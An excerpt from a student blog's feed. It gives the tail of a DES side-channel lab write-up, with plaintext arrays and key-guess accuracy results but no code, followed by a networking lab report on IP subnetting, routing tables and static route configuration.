class="number">3</span>, <span class="number">49</span>, <span class="number">51</span>, <span class="number">59</span>, <span class="number">19</span>, <span class="number">19</span>, <span class="number">4</span>, <span 
class="number">13</span>, <span class="number">62</span>, <span class="number">29</span>, <span class="number">60</span>, <span class="number">32</span>, <span class="number">32</span>, <span class="number">62</span>, <span class="number">13</span>, <span class="number">37</span>, <span class="number">3</span>, <span class="number">35</span>, <span class="number">13</span>, <span class="number">60</span>, <span class="number">9</span>, <span class="number">14</span>, <span class="number">39</span>, <span class="number">8</span>, <span class="number">5</span>, <span class="number">40</span>, <span class="number">32</span>, <span class="number">61</span>, <span class="number">17</span>, <span class="number">39</span>, <span class="number">62</span>, <span class="number">3</span>, <span class="number">61</span>, <span class="number">51</span>, <span class="number">56</span>, <span class="number">15</span>, <span class="number">58</span>, <span class="number">30</span>, <span class="number">30</span>, <span class="number">63</span>, <span class="number">51</span>, <span class="number">35</span>, <span class="number">24</span>, <span class="number">6</span>, <span class="number">18</span>, <span class="number">35</span>, <span class="number">38</span>, <span class="number">32</span>, <span class="number">45</span>, <span class="number">30</span>, <span class="number">5</span>, <span class="number">38</span>, <span class="number">19</span>, <span class="number">31</span>, <span class="number">38</span>, <span class="number">60</span>, <span class="number">30</span>, <span class="number">2</span>, <span class="number">56</span>, <span class="number">40</span>, <span class="number">25</span>, <span class="number">46</span>, <span class="number">42</span>, <span class="number">19</span>, <span class="number">57</span>, <span class="number">41</span>, <span class="number">10</span>, <span class="number">2</span>, <span class="number">11</span>, <span 
class="number">29</span>, <span class="number">16</span>, <span class="number">60</span>, <span class="number">42</span>, <span class="number">16</span>, <span class="number">32</span>, <span class="number">60</span>, <span class="number">22</span>, <span class="number">38</span>, <span class="number">28</span>, <span class="number">38</span>, <span class="number">61</span>, <span class="number">61</span>, <span class="number">49</span>, <span class="number">55</span>, <span class="number">48</span>, <span class="number">3</span>, <span class="number">5</span>, <span class="number">4</span>, <span class="number">32</span>, <span class="number">32</span>, <span class="number">57</span>, <span class="number">14</span>, <span class="number">22</span>, <span class="number">16</span>, <span class="number">49</span>, <span class="number">13</span>, <span class="number">5</span>, <span class="number">37</span>, <span class="number">1</span>, <span class="number">5</span>, <span class="number">12</span>, <span class="number">16</span>, <span class="number">33</span>, <span class="number">33</span>, <span class="number">5</span>, <span class="number">12</span>, <span class="number">31</span>, <span class="number">18</span>, <span class="number">0</span>, <span class="number">18</span>, <span class="number">26</span>, <span class="number">36</span>, <span class="number">39</span>, <span class="number">63</span>, <span class="number">38</span>, <span class="number">0</span>, <span class="number">34</span>, <span class="number">45</span>, <span class="number">9</span>, <span class="number">19</span>, <span class="number">27</span>, <span class="number">35</span>, <span class="number">45</span>, <span class="number">53</span>, <span class="number">11</span>, <span class="number">11</span>, <span class="number">42</span>, <span class="number">10</span>, <span class="number">25</span>, <span class="number">33</span>, <span class="number">55</span>, <span class="number">44</span>, 
<span class="number">7</span>, <span class="number">18</span>, <span class="number">41</span>, <span class="number">37</span>, <span class="number">10</span>, <span class="number">3</span>, <span class="number">3</span>, <span class="number">33</span>, <span class="number">25</span>, <span class="number">5</span>, <span class="number">32</span>, <span class="number">12</span>, <span class="number">28</span>, <span class="number">25</span>, <span class="number">62</span>, <span class="number">44</span>, <span class="number">45</span>, <span class="number">63</span>, <span class="number">36</span>, <span class="number">58</span>, <span class="number">30</span>, <span class="number">30</span>, <span class="number">48</span>, <span class="number">47</span>, <span class="number">54</span>, <span class="number">11</span>, <span class="number">52</span>, <span class="number">60</span>, <span class="number">10</span>, <span class="number">15</span>, <span class="number">9</span>, <span class="number">23</span>, <span class="number">28</span>, <span class="number">27</span>, <span class="number">32</span>, <span class="number">23</span>, <span class="number">55</span>, <span class="number">7</span>, <span class="number">0</span>, <span class="number">21</span>, <span class="number">59</span>, <span class="number">28</span>, <span class="number">63</span>, <span class="number">25</span>, <span class="number">20</span>, <span class="number">12</span>, <span class="number">46</span>, <span class="number">14</span>, <span class="number">54</span>, <span class="number">12</span>, <span class="number">23</span>, <span class="number">31</span>, <span class="number">62</span>, <span class="number">57</span>, <span class="number">34</span>, <span class="number">5</span>, <span class="number">50</span>, <span class="number">7</span>, <span class="number">33</span>, <span class="number">6</span>, <span class="number">16</span>, <span class="number">21</span>, <span 
class="number">37</span>, <span class="number">62</span>, <span class="number">20</span>, <span class="number">57</span>, <span class="number">3</span>, <span class="number">36</span>, <span class="number">5</span>, <span class="number">19</span>, <span class="number">2</span>, <span class="number">40</span>, <span class="number">45</span>, <span class="number">17</span>, <span class="number">8</span>, <span class="number">44</span>, <span class="number">51</span>, <span class="number">50</span>, <span class="number">31</span>, <span class="number">42</span>, <span class="number">54</span>, <span class="number">24</span>, <span class="number">32</span>, <span class="number">19</span>, <span class="number">55</span>, <span class="number">57</span>, <span class="number">11</span>, <span class="number">38</span>, <span class="number">4</span>, <span class="number">33</span>, <span class="number">60</span>, <span class="number">52</span>, <span class="number">2</span>, <span class="number">7</span>, <span class="number">21</span>, <span class="number">35</span>, <span class="number">33</span>, <span class="number">55</span>, <span class="number">18</span>, <span class="number">0</span>, <span class="number">45</span>, <span class="number">54</span>, <span class="number">12</span>, <span class="number">10</span>, <span class="number">12</span>, <span class="number">0</span>, <span class="number">18</span>, <span class="number">61</span>, <span class="number">29</span>, <span class="number">43</span>, <span class="number">13</span>, <span class="number">48</span>, <span class="number">43</span>, <span class="number">28</span>, <span class="number">36</span>, <span class="number">59</span>, <span class="number">21</span>, <span class="number">22</span>, <span class="number">22</span>, <span class="number">17</span>, <span class="number">53</span>, <span class="number">0</span>, <span class="number">15</span>, <span class="number">26</span>, <span class="number">13</span>, 
<span class="number">25</span>, <span class="number">44</span>, <span class="number">44</span>, <span class="number">61</span>, <span class="number">49</span>, <span class="number">17</span>, <span class="number">0</span>, <span class="number">26</span>, <span class="number">10</span>, <span class="number">40</span>, <span class="number">47</span>, <span class="number">59</span>, <span class="number">38</span>, <span class="number">44</span>, <span class="number">31</span>, <span class="number">22</span>, <span class="number">49</span>, <span class="number">24</span>, <span class="number">34</span>, <span class="number">24</span>, <span class="number">7</span>, <span class="number">37</span>, <span class="number">35</span>, <span class="number">4</span>, <span class="number">42</span>, <span class="number">42</span>, <span class="number">16</span>, <span class="number">20</span>, <span class="number">3</span>, <span class="number">29</span>, <span class="number">1</span>, <span class="number">38</span>, <span class="number">53</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">10</span>, <span class="number">33</span>, <span class="number">26</span>, <span class="number">24</span>, <span class="number">62</span>, <span class="number">56</span>, <span class="number">25</span>, <span class="number">46</span>, <span class="number">10</span>, <span class="number">22</span>, <span class="number">11</span>, <span class="number">57</span>, <span class="number">25</span>, <span class="number">41</span>, <span class="number">30</span>, <span class="number">37</span>, <span class="number">23</span>, <span class="number">39</span>, <span class="number">29</span>, <span class="number">12</span>, <span class="number">59</span>, <span class="number">6</span>, <span class="number">29</span>, <span class="number">27</span>, <span class="number">25</span>, <span class="number">39</span>, <span class="number">29</span>, <span 
class="number">26</span>, <span class="number">25</span>, <span class="number">9</span>, <span class="number">11</span>, <span class="number">8</span>, <span class="number">29</span>, <span class="number">48</span>, <span class="number">42</span>, <span class="number">58</span>, <span class="number">8</span>, <span class="number">25</span>, <span class="number">29</span>, <span class="number">41</span>, <span class="number">35</span>, <span class="number">47</span>, <span class="number">9</span>, <span class="number">41</span>, <span class="number">57</span>, <span class="number">30</span>, <span class="number">24</span>, <span class="number">18</span>, <span class="number">28</span>, <span class="number">12</span>, <span class="number">15</span>, <span class="number">27</span>, <span class="number">61</span>, <span class="number">37</span>, <span class="number">8</span>, <span class="number">54</span>, <span class="number">7</span>, <span class="number">38</span>, <span class="number">33</span>, <span class="number">44</span>, <span class="number">57</span>, <span class="number">9</span>, <span class="number">15</span>, <span class="number">54</span>, <span class="number">45</span>, <span class="number">50</span>, <span class="number">36</span>, <span class="number">31</span>, <span class="number">6</span>, <span class="number">3</span>, <span class="number">3</span>, <span class="number">32</span>, <span class="number">59</span>, <span class="number">15</span>, <span class="number">10</span>, <span class="number">21</span>, <span class="number">48</span>, <span class="number">22</span>, <span class="number">35</span>, <span class="number">24</span>, <span class="number">59</span>, <span class="number">38</span>, <span class="number">20</span>, <span class="number">52</span>, <span class="number">8</span>, <span class="number">45</span>, <span class="number">59</span>, <span class="number">39</span>, <span class="number">14</span>, <span class="number">37</span>, 
<span class="number">35</span>, <span class="number">8</span>, <span class="number">7</span>, <span class="number">9</span>, <span class="number">17</span>, <span class="number">15</span>, <span class="number">46</span>, <span class="number">7</span>, <span class="number">3</span>, <span class="number">59</span>, <span class="number">35</span>, <span class="number">31</span>, <span class="number">35</span>, <span class="number">9</span>, <span class="number">12</span>, <span class="number">50</span>, <span class="number">44</span>, <span class="number">28</span>, <span class="number">2</span>, <span class="number">18</span>, <span class="number">58</span>, <span class="number">53</span>, <span class="number">55</span>, <span class="number">1</span>, <span class="number">41</span>, <span class="number">37</span>, <span class="number">58</span>, <span class="number">28</span>, <span class="number">48</span>, <span class="number">58</span>, <span class="number">62</span>, <span class="number">37</span>, <span class="number">30</span>, <span class="number">18</span>, <span class="number">36</span>, <span class="number">4</span>, <span class="number">55</span>, <span class="number">55</span>, <span class="number">7</span>, <span class="number">32</span>, <span class="number">60</span>, <span class="number">55</span>, <span class="number">7</span>, <span class="number">38</span>, <span class="number">56</span>, <span class="number">42</span>, <span class="number">48</span>, <span class="number">0</span>, <span class="number">7</span>, <span class="number">15</span>, <span class="number">21</span>, <span class="number">4</span>, <span class="number">32</span>, <span class="number">60</span>, <span class="number">8</span>, <span class="number">10</span>, <span class="number">52</span>, <span class="number">51</span>, <span class="number">11</span>, <span class="number">4</span>, <span class="number">32</span>, <span class="number">26</span>, <span class="number">51</span>, 
<span class="number">13</span>, <span class="number">23</span>, <span class="number">38</span>, <span class="number">11</span>, <span class="number">23</span>, <span class="number">40</span>, <span class="number">61</span>, <span class="number">37</span>, <span class="number">19</span>, <span class="number">34</span>, <span class="number">41</span>, <span class="number">52</span>, <span class="number">37</span>, <span class="number">39</span>, <span class="number">39</span>, <span class="number">60</span>, <span class="number">24</span>, <span class="number">9</span>, <span class="number">17</span>, <span class="number">24</span>, <span class="number">20</span>, <span class="number">55</span>, <span class="number">21</span>, <span class="number">38</span>, <span class="number">52</span>, <span class="number">63</span>, <span class="number">47</span>, <span class="number">3</span>, <span class="number">7</span>, <span class="number">30</span>, <span class="number">16</span>, <span class="number">54</span>, <span class="number">19</span>, <span class="number">47</span>, <span class="number">24</span>, <span class="number">54</span>, <span class="number">63</span>, <span class="number">25</span>, <span class="number">38</span>, <span class="number">9</span>, <span class="number">21</span>, <span class="number">61</span>, <span class="number">55</span>, <span class="number">36</span>, <span class="number">40</span>, <span class="number">17</span>, <span class="number">37</span>, <span class="number">42</span>, <span class="number">37</span>, <span class="number">3</span>, <span class="number">58</span>, <span class="number">36</span>, <span class="number">17</span>, <span class="number">36</span>, <span class="number">29</span>, <span class="number">34</span>, <span class="number">52</span>, <span class="number">32</span>, <span class="number">54</span>, <span class="number">43</span>, <span class="number">53</span>, <span class="number">33</span>, <span 
class="number">49</span>, <span class="number">55</span>, <span class="number">8</span>, <span class="number">56</span>, <span class="number">38</span>, <span class="number">21</span>, <span class="number">43</span>, <span class="number">48</span>, <span class="number">24</span>, <span class="number">62</span>, <span class="number">54</span>, <span class="number">6</span>, <span class="number">48</span>, <span class="number">1</span>, <span class="number">19</span>, <span class="number">58</span>, <span class="number">46</span>, <span class="number">42</span>, <span class="number">11</span>, <span class="number">39</span>, <span class="number">2</span>, <span class="number">57</span>, <span class="number">29</span>, <span class="number">18</span>, <span class="number">7</span>, <span class="number">61</span>, <span class="number">44</span>, <span class="number">58</span>, <span class="number">35</span>, <span class="number">17</span>, <span class="number">21</span>, <span class="number">57</span>, <span class="number">49</span>, <span class="number">45</span>, <span class="number">29</span>, <span class="number">19</span>, <span class="number">11</span>, <span class="number">56</span>, <span class="number">8</span>, <span class="number">3</span>, <span class="number">60</span>, <span class="number">23</span>, <span class="number">50</span>, <span class="number">24</span>, <span class="number">25</span>, <span class="number">12</span>, <span class="number">47</span>, <span class="number">50</span>, <span class="number">18</span>, <span class="number">2</span>, <span class="number">27</span>, <span class="number">7</span>, <span class="number">29</span>, <span class="number">39</span>, <span class="number">53</span>, <span class="number">13</span>, <span class="number">21</span>, <span class="number">15</span>, <span class="number">9</span>, <span class="number">43</span>, <span class="number">3</span>, <span class="number">34</span>, <span class="number">23</span>, 
<span class="number">35</span>, <span class="number">35</span>, <span class="number">1</span>, <span class="number">2</span>, <span class="number">53</span>, <span class="number">12</span>, <span class="number">58</span>, <span class="number">46</span>, <span class="number">40</span>, <span class="number">12</span>, <span class="number">11</span>, <span class="number">51</span>, <span class="number">11</span>, <span class="number">29</span>, <span class="number">47</span>, <span class="number">6</span>, <span class="number">0</span>, <span class="number">63</span>, <span class="number">26</span>, <span class="number">34</span>, <span class="number">42</span>, <span class="number">32</span>, <span class="number">38</span>, <span class="number">1</span>, <span class="number">15</span>, <span class="number">15</span>, <span class="number">48</span>, <span class="number">19</span>, <span class="number">26</span>, <span class="number">48</span>, <span class="number">55</span>, <span class="number">27</span>, <span class="number">28</span>, <span class="number">39</span>, <span class="number">17</span>, <span class="number">19</span>, <span class="number">16</span>, <span class="number">34</span>, <span class="number">24</span>, <span class="number">19</span>, <span class="number">22</span>, <span class="number">28</span>, <span class="number">27</span>, <span class="number">54</span>, <span class="number">35</span>, <span class="number">7</span>, <span class="number">24</span>, <span class="number">34</span>, <span class="number">39</span>, <span class="number">1</span>, <span class="number">24</span>, <span class="number">14</span>, <span class="number">24</span>, <span class="number">24</span>, <span class="number">51</span>, <span class="number">41</span>, <span class="number">2</span>, <span class="number">50</span>, <span class="number">37</span>, <span class="number">50</span>, <span class="number">61</span>, <span class="number">33</span>, <span 
class="number">42</span>, <span class="number">34</span>, <span class="number">62</span>, <span class="number">54</span>, <span class="number">16</span>, <span class="number">6</span>, <span class="number">18</span>, <span class="number">21</span>, <span class="number">0</span>, <span class="number">52</span>, <span class="number">23</span>, <span class="number">52</span>, <span class="number">0</span>, <span class="number">46</span>, <span class="number">1</span>, <span class="number">51</span>, <span class="number">1</span>, <span class="number">42</span>, <span class="number">0</span>, <span class="number">48</span>, <span class="number">52</span>, <span class="number">14</span>, <span class="number">1</span>, <span class="number">47</span>, <span class="number">46</span>, <span class="number">58</span>, <span class="number">8</span>, <span class="number">15</span>, <span class="number">14</span>, <span class="number">27</span>, <span class="number">8</span>, <span class="number">60</span>, <span class="number">15</span>, <span class="number">21</span>, <span class="number">9</span>, <span class="number">36</span>, <span class="number">27</span>, <span class="number">38</span>, <span class="number">3</span>, <span class="number">24</span>, <span class="number">48</span>, <span class="number">40</span>, <span class="number">48</span>, <span class="number">15</span>, <span class="number">5</span>, <span class="number">41</span>, <span class="number">37</span>, <span class="number">43</span>, <span class="number">30</span>, <span class="number">38</span>, <span class="number">54</span>, <span class="number">49</span>, <span class="number">26</span>, <span class="number">41</span>, <span class="number">48</span>, <span class="number">10</span>, <span class="number">38</span>, <span class="number">47</span>, <span class="number">62</span>, <span class="number">54</span>, <span class="number">53</span>, <span class="number">30</span>, <span class="number">62</span>, 
<span class="number">49</span>, <span class="number">5</span>, <span class="number">18</span>, <span class="number">2</span>, <span class="number">37</span>, <span class="number">28</span>, <span class="number">9</span>, <span class="number">53</span>, <span class="number">24</span>, <span class="number">37</span>, <span class="number">56</span>, <span class="number">41</span>, <span class="number">35</span>, <span class="number">9</span>, <span class="number">6</span>, <span class="number">46</span>, <span class="number">23</span>, <span class="number">42</span>, <span class="number">49</span>]</span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/d87561249b2898b877981dd989109119.png#pic_center" alt="2-2.5"></p><center> <b> <small> Figure 8.2: Test results for the length-1000 plaintext array </small> </b></center><p>For the sake of rigor, I have also included the length-1000 plaintext array here, even though it takes up a lot of space. The length-9 and length-1000 arrays are the two plaintext arrays I used throughout this experiment.</p><p>The run results show that the length-1000 plaintext array is verified with 100% accuracy, while the length-9 plaintext array reaches 48.44%. The shorter the plaintext array, the less regular the median of the resulting Hamming-weight array and the distribution of its elements, so the key guess is not stable.</p><p>I then tested 10 random plaintext arrays of length 9 and 10 random plaintext arrays of length 1000. The results are as follows (平均正确率 in the output is the average accuracy):</p><p>Plaintext array length 9:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[<span class="number">35.94</span>%, <span class="number">59.38</span>%, <span class="number">43.75</span>%, <span class="number">65.62</span>%, <span class="number">50.00</span>%, <span class="number">51.56</span>%, <span class="number">70.31</span>%, <span class="number">43.75</span>%, <span class="number">35.94</span>%, <span class="number">56.25</span>%]</span><br><span class="line">平均正确率:<span class="number">51.25</span>%</span><br></pre></td></tr></table></figure><p>Plaintext array length 1000:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[<span class="number">100.00</span>%, <span 
class="number">100.00</span>%, <span class="number">100.00</span>%, <span class="number">100.00</span>%, <span class="number">100.00</span>%, <span class="number">100.00</span>%, <span class="number">100.00</span>%, <span class="number">100.00</span>%, <span class="number">100.00</span>%, <span class="number">100.00</span>%]</span><br><span class="line">平均正确率:<span class="number">100.00</span>%</span><br></pre></td></tr></table></figure><p><strong>Summary:</strong></p><p>Facts speak louder than words.</p><hr><p>This was a school lab, so not all of the code is shown. If anything in this write-up is described incorrectly, corrections are welcome.</p>]]></content>
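<summary type="html"><p>—————————————202&#x2F;12&#x2F;19 Update—————————————<br>On the input side, besides the key search range being limited to 0-63 because of the "6-in, 4-out" mechanism of the DES S-boxes, the plaintext fed into the S-box is likewise limited to a length of 64 per group. I updated the plaintext array length from 1000</summary>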
<category term="SCA" scheme="http://example.com/categories/SCA/"/>
<category term="experiment" scheme="http://example.com/tags/experiment/"/>
</entry>
<entry>
<title>IP Network Planning and Routing Design</title>
<link href="http://example.com/2021/09/28/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C%E5%AE%9E%E9%AA%8C%20IP%E7%BD%91%E7%BB%9C%E8%A7%84%E5%88%92%E4%B8%8E%E8%B7%AF%E7%94%B1%E8%AE%BE%E8%AE%A1/"/>
<id>http://example.com/2021/09/28/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C%E5%AE%9E%E9%AA%8C%20IP%E7%BD%91%E7%BB%9C%E8%A7%84%E5%88%92%E4%B8%8E%E8%B7%AF%E7%94%B1%E8%AE%BE%E8%AE%A1/</id>
<published>2021-09-28T14:30:18.000Z</published>
<updated>2022-03-18T06:03:46.024Z</updated>
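<content type="html"><![CDATA[<p>(This is a computer networking lab from the 头歌 platform. I did not bother to trim or edit the content and simply uploaded the lab report as is. Feel free to jump to whichever part of the article you want to read.)</p><h2 id="实验目的"><a href="#实验目的" class="headerlink" title="实验目的"></a>Lab Objectives</h2><ol><li><p>Distinguish the three types of IP address: node, network segment, and broadcast</p></li><li><p>Master the two notations for IP subnet masks</p></li><li><p>Understand what an IP gateway is</p></li><li><p>Master the basic methods of IP subnetting and network planning</p></li><li><p>Become familiar with the network simulation tool GNS3</p></li><li><p>Learn the basic router configuration commands</p></li><li><p>Gain a deep understanding of the basic structure of the routing table and the routing process</p></li><li><p>Learn the basic operations for configuring static routes and default routes</p></li><li><p>Master methods for route analysis and for locating network connectivity faults</p></li></ol><h2 id="实验环境"><a href="#实验环境" class="headerlink" title="实验环境"></a>Lab Environment</h2><ol><li>The 头歌 Linux-based virtual machine desktop</li><li>Network simulation tool GNS3</li><li>Firefox browser</li><li>Route tracing command traceroute (tracert on Windows)</li></ol><h2 id="相关原理或知识点"><a href="#相关原理或知识点" class="headerlink" title="相关原理或知识点"></a>Relevant Principles and Background</h2><ol><li><p>Two notations for IP subnet masks</p><p>A 32-bit IP subnet mask consists of a run of consecutive 1s starting from the most significant bit, followed by consecutive 0s. It can be written in two ways:</p><p>(1) Traditional notation, e.g. 255.255.255.0</p><p>(2) IP prefix (length), e.g. 24, meaning that the first 24 bits of the IP address are network bits.</p></li><li><p>The three types of IP address: node, network segment, and broadcast</p><p>In an IP network, every communicating node, IP network segment, and broadcast address is written as "IP/subnet mask", and their characteristics are entirely different, so take care not to confuse them.</p></li><li><p>IP subnets</p><p>Every IP subnet (network segment) corresponds to a contiguous block of IP addresses (an address space), and the starting address and the length of this block are always powers of 2. For example, for the subnet 172.16.0.0/24, the starting (lowest) address of the block is the subnet's network address, the ending (highest) address of the block is the subnet's broadcast address, and the remaining IP addresses are node addresses, 2^8-2=256-2=254 in total.</p></li><li><p>Basic structure of the routing table</p><p>The entries that make up a routing table are called route entries. A typical routing table looks like this:</p><center><b><small> Table 3.1: A typical routing table</small></b></center></li></ol><table><thead><tr><th align="center">Destination IP/Mask</th><th align="center">Protocol</th><th align="center">Preference</th><th align="center">Cost</th><th align="center">Next hop</th><th align="center">Local outgoing interface</th></tr></thead><tbody><tr><td align="center">8.0.0.0/8</td><td align="center">RIP</td><td align="center">100</td><td align="center">3</td><td align="center">130.0.0.2</td><td align="center">Serial1/0</td></tr><tr><td align="center">9.0.0.0/8</td><td align="center">OSPF</td><td align="center">10</td><td align="center">50</td><td align="center">123.0.3.21</td><td align="center">Serial1/1</td></tr><tr><td align="center">9.1.0.0/16</td><td align="center">RIP</td><td align="center">100</td><td 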
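align="center">4</td><td align="center">203.9.0.2</td><td align="center">Ethernet0/0</td></tr><tr><td align="center">9.1.15.0/24</td><td align="center">Static</td><td align="center">60</td><td align="center">0</td><td align="center">172.0.31.2</td><td align="center">Ethernet0/1</td></tr><tr><td align="center">20.0.0.0/24</td><td align="center">Direct</td><td align="center">0</td><td align="center">0</td><td align="center"></td><td align="center">FastEthernet0/0</td></tr><tr><td align="center">3.3.3.2/32</td><td align="center">Static</td><td align="center">1</td><td align="center">0</td><td align="center">192.1.1.2</td><td align="center">LoopBack0</td></tr><tr><td align="center">0.0.0.0/0</td><td align="center">Static</td><td align="center">1</td><td align="center">0</td><td align="center">10.0.1.2</td><td align="center">GigabitEthernet0</td></tr></tbody></table><p>5. The role of the routing table</p><p>Every router in a network uses two or more network interfaces to interconnect networks; each such interface is called a routed interface. Every routed interface must have an IP address, and if the IP network segment that the interface sits on also contains user hosts or servers, that interface is their IP gateway. The main purpose of the routing table is routing, which is the most basic of a router's functions. When a packet enters the router from outside, the router first determines whether it is a transit packet or a packet addressed to the router itself; a transit packet must then be routed.</p><p>6. Static configuration of the routing table</p><p>Command to add a static route (目标IP = destination IP, 目标掩码 = destination mask, 下一跳IP = next-hop IP): <code>ip route 目标IP 目标掩码 下一跳IP</code></p><p>Command to delete a static route: <code>no ip route 目标IP 目标掩码 下一跳IP</code></p><p>7. Default routes and their configuration</p><p>A route entry in the routing table whose destination IP/mask is 0/0 is called the default route entry.</p><p>If the routing table contains a default route entry, in theory every IP address matches it.</p><p>Meaning of the destination 0/0: all non-0/0 destinations registered in the current router are known; relative to the whole network, every other unregistered destination is unknown, and these can all be represented collectively by 0/0.</p><p>The biggest advantage of the default route entry: it can express destinations in bulk, which makes configuration more efficient, but you must make sure those destinations share a common next hop, otherwise the network can never achieve full connectivity.</p><p>Default route configuration example: <code>ip route 0.0.0.0 0.0.0.0 10.10.10.10</code></p><h2 id="实验任务"><a href="#实验任务" class="headerlink" title="实验任务"></a>Lab Tasks</h2><ol><li>Plan the IP subnets, assign the IP addresses, and fill in the corresponding tables</li><li>Configure the IP addresses of the PCs and of each router interface according to the IP address assignment table</li><li>Configure static routes between the PCs and the routers and between the routers, then view and analyze the configuration files</li><li>Configure default routes for the stub routers, then run network connectivity tests and route tracing tests</li></ol><h2 id="IP网络规划"><a href="#IP网络规划" class="headerlink" title="IP网络规划"></a>IP Network Planning</h2><p>The IP subnet address plan uses subnetting.</p><center> <b> <small> Table 5.1: IP subnet address plan </small> </b></center><table><thead><tr><th align="center">Segment No.</th><th 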
align="center">IP address</th><th align="center">Subnet mask</th><th align="center">IPs required</th><th align="center">Segment type</th><th align="center">Gateway IP</th><th>Member nodes in the diagram</th></tr></thead><tbody><tr><td align="center">1</td><td align="center">192.168.1.0</td><td align="center">24</td><td align="center">230</td><td align="center">User</td><td align="center">192.168.1.254</td><td>PC1, R1 interface F0/0</td></tr><tr><td align="center">2</td><td align="center">192.168.2.252</td><td align="center">30</td><td align="center">2</td><td align="center">Interconnect</td><td align="center">None</td><td>R1 interface F0/1, R2 interface F0/0</td></tr><tr><td align="center">3</td><td align="center">192.168.3.252</td><td align="center">30</td><td align="center">2</td><td align="center">Interconnect</td><td align="center">None</td><td>R2 interface F0/1, R3 interface F0/0</td></tr><tr><td align="center">4</td><td align="center">192.168.4.128</td><td align="center">25</td><td align="center">100</td><td align="center">User</td><td align="center">192.168.4.129</td><td>R3 interface F0/1, PC2</td></tr><tr><td align="center">5</td><td align="center">192.168.5.252</td><td align="center">30</td><td align="center">2</td><td align="center">Interconnect</td><td align="center">None</td><td>R2 interface F1/0, R4 interface F0/0</td></tr><tr><td align="center">6</td><td align="center">192.168.6.192</td><td align="center">26</td><td align="center">60</td><td align="center">User</td><td align="center">192.168.6.193</td><td>R4 interface F0/1, PC3</td></tr></tbody></table><p>To divide the network into different segments, the first step is to set different network identifiers. To do that, we first need to understand how a network identifier is computed and determined.</p><p>The network identifier is the basis for dividing segments: different segments always have different network identifiers. It is obtained by converting both the IP address and the subnet mask to binary and ANDing them bit by bit; the result is the network identifier.</p><p>Take 192.168.1.20/24 as an example:</p><p>IP: 11000000.10101000.00000001.00010100</p><p>Subnet mask: 11111111.11111111.11111111.00000000</p><p>AND result: 11000000.10101000.00000001.00000000 == 192.168.1.0</p><p>The network identifier is computed differently for class A, B, and C addresses, as follows:</p><blockquote><p>Class A: only the first octet counts</p><p>Class B: only the first and second octets count</p><p>Class C: the first, second, and third octets count</p></blockquote><p>Because this lab uses class C addresses, 192.168.1.0 is the network identifier of 192.168.1.20/24, which also shows that the IP 192.168.1.20 lies in the 192.168.1.0 segment.</p><p><strong><font 
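color='red'>However, the segment test above only applies when no subnetting has been done. Once subnetting is applied, the computed network identifier and the segment test are different!</font></strong></p><p><strong>Subnetting</strong></p><p>Since subnetting has come up, let us cover it first; how the result differs is answered in the analysis of subnetting below.</p><p>Subnetting exists to create different network segments, and different segments mean different network identifiers. As the earlier example made clear, the network identifier is obtained by ANDing the IP address with the subnet mask. And since <code>ANDing with 1 always yields the bit itself, while ANDing with 0 does not necessarily yield the bit itself</code>, the subnet mask has the power to determine the resulting network identifier.</p><p>Why is that? Note that an IP address is made up of a network address and a host address. Dividing segments means dividing the network-address part of the IP: different network addresses denote different segments, and the remaining bits denote the host address. So the relationship between a segment and its host addresses is one-to-N.</p><p>Take the 192.168.1.0 segment: the first three octets are the network address and the last octet is the host address. The host IPs that can be expressed within the 192.168.1.0 segment range over 192.168.1.1~192.168.1.254 (excluding all-0 and all-1 host bits); that is the one-to-N relationship.</p><blockquote><p>All-0 host bits denote the network itself and all-1 host bits are reserved as the broadcast address, so, with these two host values reserved, all-0 and all-1 are excluded.</p></blockquote><p>Within a segment the network part does not change; only the host bits change. Doesn't that match the statement "<code>ANDing with 1 always yields the bit itself, while ANDing with 0 does not necessarily yield the bit itself</code>" nicely? The part of the IP that is ANDed with the 1 bits of the subnet mask comes out unchanged, so the number of 1 bits in the subnet mask determines the number of network-address bits, and therefore the segment.</p><p>We now know that <code>the subnet mask has the power to determine the segment</code>. So the question raised by the red text above, "<font color='red'>once subnetting is applied, the computed network identifier and the segment test are different</font>", has its answer: the number of 1 bits in the subnet mask determines how many bits of the ANDed network identifier stay unchanged, that is, the number of network-address bits, that is, the segment.</p><p>So after subnetting according to the required number of subnets or the required number of hosts, the segment can no longer be decided simply from the first few octets of the AND result; instead, the number of 1 bits in the subnet mask decides how many leading bits of the AND result identify the segment.</p><blockquote><p>In fact it has always been the number of 1 bits in the subnet mask that decides this; judging by the first few octets is just the default for each address class.</p></blockquote><p>Let us now continue with the analysis of subnetting.</p><p>Subnets can be divided by the number of subnets or by the number of hosts. In this lab the task only specifies the number of IPs required, so we divide by the number of hosts.</p><p>Take the fourth segment as a worked example. It requires 100 IPs; because 2^6 &lt; 100 &lt; 2^7, 7 host bits are needed, since 7 host bits can express 2^7-2 IPs (excluding all-0 and all-1 host bits).</p><p>With 7 host bits, the IP has 32-7=25 network bits, so the first 25 bits of the subnet mask are 1, giving the subnet mask 255.255.255.128; the subnet mask column in the table is therefore filled in as 25.</p><p>The segment IP can be either 192.168.4.0 or 192.168.4.128. The ranges they cover are 192.168.4.1~192.168.4.127 and 192.168.4.128~192.168.4.254 respectively, and both ranges are large enough to assign 100 IPs. When the first bit of the fourth octet of the IP is 1, ANDing the IP with the subnet mask gives 192.168.4.128, meaning the address falls in the 192.168.4.128 segment, so the 192.168.4.0 segment can represent at most 128 IPs.</p><p>As for why the third octet is 4, it is simply because it counts up from 1 to 4.</p><center> <b> <small> Table 5.2: IP address assignment table </small> </b></center><table><thead><tr><th align="center">No.</th><th align="center">Node name</th><th align="center">IP address/subnet mask</th><th align="center">Gateway IP</th></tr></thead><tbody><tr><td align="center">1</td><td align="center">PC1</td><td align="center">192.168.1.1/24</td><td align="center">192.168.1.254</td></tr><tr><td align="center">2</td><td align="center">R1 interface F0/0</td><td 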
